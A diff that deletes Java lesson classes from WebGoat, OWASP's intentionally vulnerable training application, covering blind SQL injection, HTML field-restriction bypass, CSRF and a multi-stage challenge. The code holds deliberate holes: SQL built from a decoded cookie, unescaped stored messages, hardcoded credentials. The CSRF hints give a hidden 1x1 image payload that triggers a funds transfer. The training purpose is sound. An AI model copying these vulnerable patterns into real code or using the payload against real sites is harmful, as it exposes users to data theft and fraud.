-    private final static Integer DEFAULT_RANKING = new Integer(95);
-
-    protected Integer getDefaultRanking()
-    {
-    return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DatabaseFieldScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-    return ("Blind String SQL Injection");
-    }
-
-    /**
-     * Constructor for the DatabaseFieldScreen object
-     * 
-     * @param s
-     *                Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-    try
-    {
-        super.handleRequest(s);
-    }
-    catch (Exception e)
-    {
-        System.out.println("Exception caught: " + e);
-        e.printStackTrace(System.out);
-    }
-    }
-}

src/main/java/org/owasp/webgoat/lessons/BypassHtmlFieldRestrictions.java

@@ -1,248 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
- *         site</a> 
- * @created October 29, 2009
- */
-public class BypassHtmlFieldRestrictions extends SequentialLessonAdapter
-{
-    public final static A MANDIANT_LOGO = new A().setHref("http://www.mandiant.com").addElement(new IMG("images/logos/mandiant.png").setAlt("MANDIANT").setBorder(0).setHspace(0).setVspace(0));
-    
-    private final static String USERID = "userid";
-
-    private String userid;
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {           
-        ElementContainer ec = new ElementContainer();
-        
-        try {
-            boolean failed = false;
-
-            // select element
-            ec.addElement(new Div().addElement(new StringElement("Select field with two possible values:")));
-            
-            String[] allowedSelect = {"foo", "bar"};
-    
-            ec.addElement(new org.apache.ecs.html.Select("select", allowedSelect));
-            
-            // radio button element
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement("Radio button with two possible values:")));
-            
-            
-            Input radiofoo = new Input("radio", "radio", "foo");
-            radiofoo.setChecked(true);
-            ec.addElement(radiofoo);
-            ec.addElement(new StringElement("foo"));
-            ec.addElement(new BR());
-            ec.addElement(new Input("radio", "radio", "bar"));
-            ec.addElement(new StringElement("bar"));
-            
-            // checkbox
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement("Checkbox:")));
-            Input checkbox = new Input("checkbox", "checkbox");
-            checkbox.setChecked(true);
-            ec.addElement(checkbox);
-            ec.addElement(new StringElement("checkbox"));
-            
-            // create shortinput
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement("Input field restricted to 5 characters:")));
-            Input shortinput = new Input(Input.TEXT, "shortinput", "12345");
-            shortinput.setMaxlength(5);
-            ec.addElement(shortinput);
-
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement("Disabled input field:")));
-            String defaultdisabledinputtext = "disabled";
-            Input disabledinput = new Input(Input.TEXT, "disabledinput", defaultdisabledinputtext);
-            disabledinput.setDisabled(true);
-            ec.addElement(disabledinput);
-            ec.addElement(new BR());
-    
-            // Submit Button
-            ec.addElement(new P());
-            ec.addElement(new Div().addElement(new StringElement("Submit button:")));
-            String submittext = "Submit";
-            Element b = ECSFactory.makeButton(submittext);
-            ec.addElement(b);
-            
-            //  Now check inputs that were submitted (if any)
-            
-            // check select field
-            String submittedselect = s.getParser().getRawParameter("select");
-            if(submittedselect.equals("foo")) failed = true;
-            if(submittedselect.equals("bar")) failed = true;
-            
-            // check radio buttons
-            String submittedradio = s.getParser().getRawParameter("radio");
-            if(submittedselect.equals("foo")) failed = true;
-            if(submittedselect.equals("bar")) failed = true;
-            
-            // check checkbox (note - if the box is not checked, this will throw an exception, but that
-            // is okay)
-            if(s.getParser().getRawParameter("checkbox").equals("on")) failed = true;
-            
-            // check shortinput
-            if(s.getParser().getRawParameter("shortinput").length() < 6) failed = true;
-            
-            // check disabledinput (note - if the field was not re-enabled, this will throw an exception, but that
-            // is okay)
-            if(s.getParser().getRawParameter("disabledinput").equals(defaultdisabledinputtext)) failed = true;
-            
-            // check submitbutton
-            if(s.getParser().getRawParameter("SUBMIT").equals(submittext)) failed = true;
-            
-            
-            // if we didn't fail, we succeeded!
-            if(failed != true) {
-                makeSuccess(s);
-            }
-            
-        } catch(ParameterNotFoundException e) {
-            //s.setMessage("Error, required parameter not found");
-            e.printStackTrace();
-        }
-        
-        return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.PARAMETER_TAMPERING;
-    }
-
-    /**
-     * Gets the credits attribute of the AbstractLesson object
-     * 
-     * @return The credits value
-     */
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Chuck Willis&nbsp;", MANDIANT_LOGO);
-    }
-    
-    /**
-     * Gets the hints attribute of the DatabaseFieldScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        
-        hints.add(getLabelManager().get("BypassHtmlFieldRestrictionsHint1"));
-        hints.add(getLabelManager().get("BypassHtmlFieldRestrictionsHint2"));
-        hints.add(getLabelManager().get("BypassHtmlFieldRestrictionsHint3"));
-
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DatabaseFieldScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Bypass HTML Field Restrictions");
-    }
-
-    /**
-     * Gets the instructions attribute of the SqlInjection object
-     *  
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-    String instructions = "The form below uses HTML form field restrictions. " + 
-        " In order to pass this lesson, submit the form with each field containing an unallowed value. "
-    + "<b>You must submit invalid values for all six fields in one form submission.</b>";
-
-    return (instructions);
-    }
-    
-    /**
-     * Constructor for the DatabaseFieldScreen object
-     * 
-     * @param s
-     *            Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-        try
-        {
-            super.handleRequest(s);
-        } catch (Exception e)
-        {
-            // System.out.println("Exception caught: " + e);
-            e.printStackTrace(System.out);
-        }
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/CSRF.java

@@ -1,382 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.Enumeration;
-import java.util.List;
-
-import javax.servlet.http.HttpSession;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.html.TextArea;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- * 
- */
-public class CSRF extends LessonAdapter
-{
-    protected static final String TRANSFER_FUNDS_PARAMETER = "transferFunds";
-    protected static final String TRANSFER_FUNDS_PAGE = "main";
-    private final static String MESSAGE = "message";
-    private final static int MESSAGE_COL = 3;
-    private final static String NUMBER = "Num";
-    private final static int NUM_COL = 1;
-    private final static String STANDARD_QUERY = "SELECT * FROM messages";
-    private final static String TITLE = "title";
-    private final static int TITLE_COL = 2;
-    private static int count = 1;
-    private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted
-    // message
-    public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-    /**
-     * Adds a feature to the Message attribute of the MessageBoardScreen object
-     * 
-     * @param s
-     *            The feature to be added to the Message attribute
-     */
-    protected void addMessage(WebSession s)
-    {
-        try
-        {
-            String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
-            String message = s.getParser().getRawParameter(MESSAGE, "");
-
-            Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
-
-            String query = "INSERT INTO messages VALUES (?, ?, ?, ?, ? )";
-
-            PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                        ResultSet.CONCUR_READ_ONLY);
-            statement.setInt(1, count++);
-            statement.setString(2, title);
-            statement.setString(3, message);
-            statement.setString(4, s.getUserName());
-            statement.setString(5, this.getClass().getName());
-            statement.execute();
-
-        } catch (Exception e)
-        {
-            s.setMessage("Could not add message to database");
-        }
-    }
-
-    @Override
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        
-        if (isTransferFunds(s)){
-            ec.addElement(doTransfer(s));
-        } else {
-            addMessage(s);
-            ec.addElement(makeInput(s));
-            ec.addElement(new HR());
-            ec.addElement(makeCurrent(s));
-            ec.addElement(new HR());
-            ec.addElement(makeList(s));
-        }
-        return ec;
-    }
-
-    /**
-     * if TRANSFER_FUND_PARAMETER is a parameter, then doTransfer is invoked.  doTranser presents the 
-     * web content to display the electronic transfer of funds.  An request
-     * should have a dollar amount specified.  When this page is accessed it will mark the lesson complete  
-     * 
-     * @param s
-     * @return Element will appropriate web content for a transfer of funds.
-     */
-    protected Element doTransfer(WebSession s) {
-        String transferFunds = HtmlEncoder.encode(s.getParser().getRawParameter(TRANSFER_FUNDS_PARAMETER, ""));
-        ElementContainer ec = new ElementContainer();
-        
-        if (transferFunds.equalsIgnoreCase(TRANSFER_FUNDS_PAGE)){
-            
-            //transfer form
-            ec.addElement(new H1("Electronic Transfer:"));
-            String action = getLink();
-            Form form = new Form(action, Form.POST);
-            form.addElement( new Input(Input.text, TRANSFER_FUNDS_PARAMETER, "0"));
-            //if this token is present we won't mark the lesson as completed
-            form.addElement( new Input(Input.submit));
-            ec.addElement(form);
-            //present transfer funds form
-        } else if (transferFunds.length() != 0){
-            
-            //transfer is confirmed
-            ec.addElement(new H1("Electronic Transfer Complete"));
-            ec.addElement(new StringElement("Amount Transfered: "+transferFunds));
-            makeSuccess(s);
-        } 
-        return ec;
-    }
-
-    /**
-     * @param s current web session
-     * @return true if the page should be rendered as a Transfer of funds page or false for the normal message posting page.
-     */
-    protected boolean isTransferFunds(WebSession s) {
-        return s.getRequest().getParameterMap().containsKey(TRANSFER_FUNDS_PARAMETER);
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element makeInput(WebSession s)
-    {
-        Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-        TR row1 = new TR();
-        TR row2 = new TR();
-        row1.addElement(new TD(new StringElement("Title: ")));
-
-        Input inputTitle = new Input(Input.TEXT, TITLE, "");
-        row1.addElement(new TD(inputTitle));
-
-        TD item1 = new TD();
-        item1.setVAlign("TOP");
-        item1.addElement(new StringElement("Message: "));
-        row2.addElement(item1);
-
-        TD item2 = new TD();
-        TextArea ta = new TextArea(MESSAGE, 12, 60);
-        ta.addAttribute("wrap", "soft");
-        item2.addElement(ta);
-        row2.addElement(item2);
-        t.addElement(row1);
-        t.addElement(row2);
-
-        Element b = ECSFactory.makeButton("Submit");
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(t);
-        ec.addElement(new P().addElement(b));
-
-        return (ec);
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    public Element makeList(WebSession s)
-    {
-        Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-
-        try
-        {
-            Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
-
-            // edit by Chuck Willis - Added logic to associate similar usernames
-            // The idea is that users chuck-1, chuck-2, etc will see each other's messages
-            // but not anyone elses. This allows users to try out XSS to grab another user's
-            // cookies, but not get confused by other users scripts
-
-            String query = "SELECT * FROM messages WHERE user_name LIKE ? and lesson_type = ?";
-            PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                        ResultSet.CONCUR_READ_ONLY);
-            statement.setString(1, getNameroot(s.getUserName()) + "%");
-            statement.setString(2, getClass().getName());
-            ResultSet results = statement.executeQuery();
-
-            if ((results != null) && (results.first() == true))
-            {
-                results.beforeFirst();
-
-                for (int i = 0; results.next(); i++)
-                {
-                    String link = "<a href='" + getLink() + "&" + NUMBER + "=" + results.getInt(NUM_COL)
-                            + "' style='cursor:hand'>" + results.getString(TITLE_COL) + "</a>";
-                    TD td = new TD().addElement(link);
-                    TR tr = new TR().addElement(td);
-                    t.addElement(tr);
-                }
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error while getting message list.");
-        }
-
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(new H1("Message List"));
-        ec.addElement(t);
-        String transferFunds = s.getParser().getRawParameter("transferFunds", "");
-        if (transferFunds.length() != 0)
-        {
-            makeSuccess(s);
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element makeCurrent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            int messageNum = s.getParser().getIntParameter(NUMBER, 0);
-
-            Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
-
-            String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ? and lesson_type = ?";
-            PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                        ResultSet.CONCUR_READ_ONLY);
-            statement.setString(1, getNameroot(s.getUserName()) + "%");
-            statement.setInt(2, messageNum);
-            statement.setString(3, this.getClass().getName());
-            ResultSet results = statement.executeQuery();
-
-            if ((results != null) && results.first())
-            {
-                ec.addElement(new H1("Message Contents For: " + results.getString(TITLE_COL)));
-                Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-                TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
-                row1.addElement(new TD(new StringElement(results.getString(TITLE_COL))));
-                t.addElement(row1);
-
-                String messageData = results.getString(MESSAGE_COL);
-                TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
-                row2.addElement(new TD(new StringElement(messageData)));
-                t.addElement(row2);
-
-                TR row3 = new TR(new TD(new StringElement("Posted By:")));
-                row3.addElement(new TD(new StringElement(results.getString(USER_COL))));
-                t.addElement(row3);
-
-                ec.addElement(t);
-
-            }
-            else
-            {
-                if (messageNum != 0)
-                {
-                    ec.addElement(new P().addElement("Could not find message " + messageNum));
-                }
-            }
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    @Override
-    protected Category getDefaultCategory()
-    {
-        return Category.XSS;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(121);
-
-    @Override
-    protected Integer getDefaultRanking()
-    {
-
-        return DEFAULT_RANKING;
-    }
-
-    @Override
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Enter some text and try to include an image in there.");
-        hints.add("In order to make the picture almost invisible try to add width=\"1\" and height=\"1\".");
-        hints.add("The format of an image in html is <pre>&lt;img src=\"[URL]\" width=\"1\" height=\"1\" /&gt;</pre>");
-        hints.add("Include this URL in the message <pre>&lt;img src='" + getLink()
-                + "&transferFunds=5000' width=\"1\" height=\"1\" /&gt;</pre>");
-
-        return hints;
-    }
-
-    /**
-     * Gets the title attribute of the MessageBoardScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Cross Site Request Forgery (CSRF)");
-    }
-
-    private static String getNameroot(String name)
-    {
-        String nameroot = name;
-        if (nameroot.indexOf('-') != -1)
-        {
-            nameroot = nameroot.substring(0, nameroot.indexOf('-'));
-        }
-        return nameroot;
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Sherif Koussa&nbsp;", MAC_LOGO);
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/Challenge2Screen.java

@@ -1,807 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.FileReader;
-import java.io.FileWriter;
-import java.io.OutputStreamWriter;
-import java.net.DatagramPacket;
-import java.net.DatagramSocket;
-import java.net.InetAddress;
-import java.net.Socket;
-import java.net.URLDecoder;
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-import java.util.StringTokenizer;
-import java.util.Vector;
-import javax.servlet.http.Cookie;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.IFrame;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.Exec;
-import org.owasp.webgoat.util.ExecResults;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class Challenge2Screen extends SequentialLessonAdapter
-{
-    private static final String USER_COOKIE = "user";
-
-    private static final String JSP = ".jsp";
-
-    private static final String WEBGOAT_CHALLENGE = "webgoat_challenge";
-
-    private static final String WEBGOAT_CHALLENGE_JSP = WEBGOAT_CHALLENGE + JSP;
-
-    private static final String PROCEED_TO_NEXT_STAGE = "Proceed to the next stage...";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String CREDIT = "Credit";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String PROTOCOL = "File";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String MESSAGE = "Message";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String PARAM = "p";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String PASSWORD = "Password";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String USER = "user";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String USERNAME = "Username";
-
-    private String pass = "goodbye";
-
-    private String user = "youaretheweakestlink";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    /**
-     * Determine the username and password
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception Exception
-     *                Description of the Exception
-     */
-    protected Element doStage1(WebSession s) throws Exception
-    {
-        setStage(s, 1);
-
-        String username = s.getParser().getRawParameter(USERNAME, "");
-        String password = s.getParser().getRawParameter(PASSWORD, "");
-
-        if (username.equals(user) && password.equals(pass))
-        {
-            s.setMessage("Welcome to stage 2 -- get credit card numbers!");
-            setStage(s, 2);
-
-            return (doStage2(s));
-        }
-
-        s.setMessage("Invalid login");
-
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(makeLogin(s));
-
-        // <START_OMIT_SOURCE>
-        // these are red herrings for the first stage
-        Input input = new Input(Input.HIDDEN, USER, user);
-        ec.addElement(input);
-
-        Cookie newCookie = new Cookie(USER_COOKIE, Encoding.base64Encode(user));
-        s.getResponse().addCookie(newCookie);
-        phoneHome(s, "User: " + username + " --> " + "Pass: " + password);
-        // <END_OMIT_SOURCE>
-
-        return (ec);
-    }
-
-    // get creditcards from database
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception Exception
-     *                Description of the Exception
-     */
-    protected Element doStage2(WebSession s) throws Exception
-    {
-        // <START_OMIT_SOURCE>
-
-        Cookie newCookie = new Cookie(USER_COOKIE, Encoding.base64Encode(user));
-        s.getResponse().addCookie(newCookie);
-
-        ElementContainer ec = new ElementContainer();
-        if (s.getParser().getStringParameter(Input.SUBMIT, "").equals(PROCEED_TO_NEXT_STAGE + "(3)"))
-        {
-            s.setMessage("Welcome to stage 3 -- deface the site");
-            setStage(s, 3);
-            // Reset the defaced webpage so the lesson can start over
-            resetWebPage(s);
-            return doStage3(s);
-        }
-
-        Connection connection = DatabaseUtilities.getConnection(s);
-
-        Statement statement3 = connection
-                .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-        // pull the USER_COOKIE from the cookies
-        String cookie = getCookie(s);
-        if (null == cookie) {
-        	cookie = "";
-        } else {
-        	cookie = URLDecoder.decode(cookie,"utf-8");
-        }
-        
-        String user = Encoding.base64Decode(cookie);
-        String query = "SELECT * FROM user_data WHERE last_name = '" + user + "'";
-        Vector<String> v = new Vector<String>();
-
-        try
-        {
-            ResultSet results = statement3.executeQuery(query);
-
-            while (results.next())
-            {
-                String type = results.getString("cc_type");
-                String num = results.getString("cc_number");
-                v.addElement(type + "-" + num);
-            }
-            if (v.size() != 13)
-            {
-                s.setMessage("Try to get all the credit card numbers");
-            }
-
-            ec.addElement(buildCart(s));
-
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            ec.addElement(new BR());
-            TR tr = new TR();
-            tr.addElement(new TD().addElement("Please select credit card for this purchase: "));
-            Element p = ECSFactory.makePulldown(CREDIT, v);
-            tr.addElement(new TD().addElement(p).setAlign("right"));
-            t.addElement(tr);
-
-            tr = new TR();
-            Element b = ECSFactory.makeButton("Buy Now!");
-            tr.addElement(new TD().addElement(b));
-            t.addElement(tr);
-            ec.addElement(t);
-
-            ec.addElement(new BR());
-            Input input = new Input(Input.HIDDEN, USER, user);
-            ec.addElement(input);
-
-            // STAGE 3 BUTTON
-            if (v.size() == 13)
-            {
-                s.setMessage("Congratulations! You stole all the credit cards, proceed to stage 3!");
-                s.setMessage("  - Look in the credit card pull down to see the numbers.");
-                ec.addElement(new BR());
-                // TR inf = new TR();
-                Center center = new Center();
-                Element proceed = ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(3)");
-                center.addElement(proceed);
-                // inf.addElement(new TD().addElement(proceed).setAlign("center"));
-                ec.addElement(center);
-            }
-
-        } catch (Exception e)
-        {
-            s.setMessage("An error occurred in the woods");
-        }
-
-        return (ec);
-        // <END_OMIT_SOURCE>
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception Exception
-     *                Description of the Exception
-     */
-    /*
-     * (non-Javadoc)
-     * @see lessons.LessonAdapter#doStage3(session.WebSession)
-     */
-    protected Element doStage3(WebSession s) throws Exception
-    {
-        // <START_OMIT_SOURCE>
-
-        ElementContainer ec = new ElementContainer();
-        if (s.getParser().getStringParameter(Input.SUBMIT, "").equals(PROCEED_TO_NEXT_STAGE + "(4)"))
-        {
-            setStage(s, 4);
-            // Reset the defaced webpage so the lesson can start over
-            resetWebPage(s);
-            return doStage4(s);
-        }
-
-        // execute the possible attack first to determine if site is defaced.
-        ElementContainer netstatResults = getNetstatResults(s);
-        if (isDefaced(s))
-        {
-            ec.addElement(new HR());
-            s.setMessage("CONGRATULATIONS - You have defaced the site!");
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-            TR tr = new TR();
-            tr.addElement(new TD().setAlign("center").addElement(ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(4)")));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement(showDefaceAttempt(s)));
-            t.addElement(tr);
-            ec.addElement(t);
-            return ec;
-        }
-        else
-        {
-            // Setup the screen content
-            try
-            {
-                ec.addElement(new H1("Current Network Status:"));
-                ec.addElement(netstatResults);
-
-                Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
-                if (s.isColor())
-                {
-                    t.setBorder(1);
-                }
-                String[] list = { "tcp", "tcpv6", "ip", "ipv6", "udp", "udpv6" };
-
-                TR tr = new TR();
-                tr.addElement(new TD().addElement(ECSFactory.makeButton("View Network")));
-                tr.addElement(new TD().setWidth("35%").addElement(ECSFactory.makePulldown(PROTOCOL, list, "", 5)));
-                t.addElement(tr);
-
-                ec.addElement(t);
-            } catch (Exception e)
-            {
-                ec.addElement(new P().addElement("Error in obtaining network status"));
-            }
-
-            ec.addElement(new HR());
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-            TR tr = new TR();
-            tr.addElement(new TD().addElement(showDefaceAttempt(s)));
-            t.addElement(tr);
-            ec.addElement(t);
-        }
-        return (ec);
-        // <END_OMIT_SOURCE>
-    }
-
-    private boolean isDefaced(WebSession s)
-    {
-        // <START_OMIT_SOURCE>
-        boolean defaced = false;
-        try
-        {
-            // get current text and compare to the new text
-            String origpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
-            String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP);
-            String defacedText = getFileText(new BufferedReader(new FileReader(origpath)), false);
-            String origText = getFileText(new BufferedReader(new FileReader(masterFilePath)), false);
-
-            defaced = (!origText.equals(defacedText));
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-        return defaced;
-        // <END_OMIT_SOURCE>
-    }
-
-    private Element showDefaceAttempt(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        // show webgoat.jsp text
-        ec.addElement(new H1().addElement("Original Website Text"));
-        ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc(s.getRequest().getContextPath() + "/" + WEBGOAT_CHALLENGE_JSP));
-        ec.addElement(new HR());
-        ec.addElement(new H1().addElement("Defaced Website Text"));
-        ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc(
